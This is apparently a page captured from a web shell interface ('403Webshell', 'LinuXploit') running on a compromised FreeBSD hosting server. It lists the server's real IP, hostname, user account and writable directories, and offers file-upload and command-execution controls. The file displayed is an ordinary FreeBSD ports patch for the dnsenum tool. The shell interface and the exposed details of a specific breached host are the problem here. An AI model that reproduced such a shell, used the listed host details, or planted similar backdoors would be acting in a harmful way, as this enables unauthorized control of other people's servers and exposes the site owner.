403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/dns/dnsenum/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/dns/dnsenum/files/patch-dnsenum.pl
--- dnsenum.pl.orig	2016-04-22 00:50:16 UTC
+++ dnsenum.pl
@@ -58,6 +58,8 @@ use Net::Netmask;
 use XML::Writer;
 use Socket;
 use String::Random;
+no if $] >= 5.017011, warnings => 'experimental::smartmatch';
+
 
 my ($ithreads_support, $whois_support, $mech_support, $html_support,$xml_support);
 
@@ -71,7 +73,7 @@ my ($domain, $recur, $table, $extend_b, 
 my ($timeout, $delay, $pages, $ipcount, $ipvalid) = (10, 3, 5, 0, 0);
 my ($output);
 my $writer;
-my $program = 'dnsenum.pl';
+my $program = 'dnsenum';
 my $string_gen = String::Random->new;
 my $wildcards = $string_gen->randpattern("cccccccccccc");
 my @wildcardaddress;
@@ -176,11 +178,6 @@ if ($whois && !defined $whois_support) {
 		"whois queries disabled.\n";
 	$whois = undef;
 }
-if ($whois && !defined $whois_support) {
-	warn "Warning: can't load Net::Whois::IP module, ".
-		"whois queries disabled.\n";
-	$whois = undef;
-}
 if ($output && !defined $xml_support) {
 	warn "Warning: can't load XML::Writer module, ".
 		"xml output disabled.\n";

Youez - 2016 - github.com/yon3zu
LinuXploit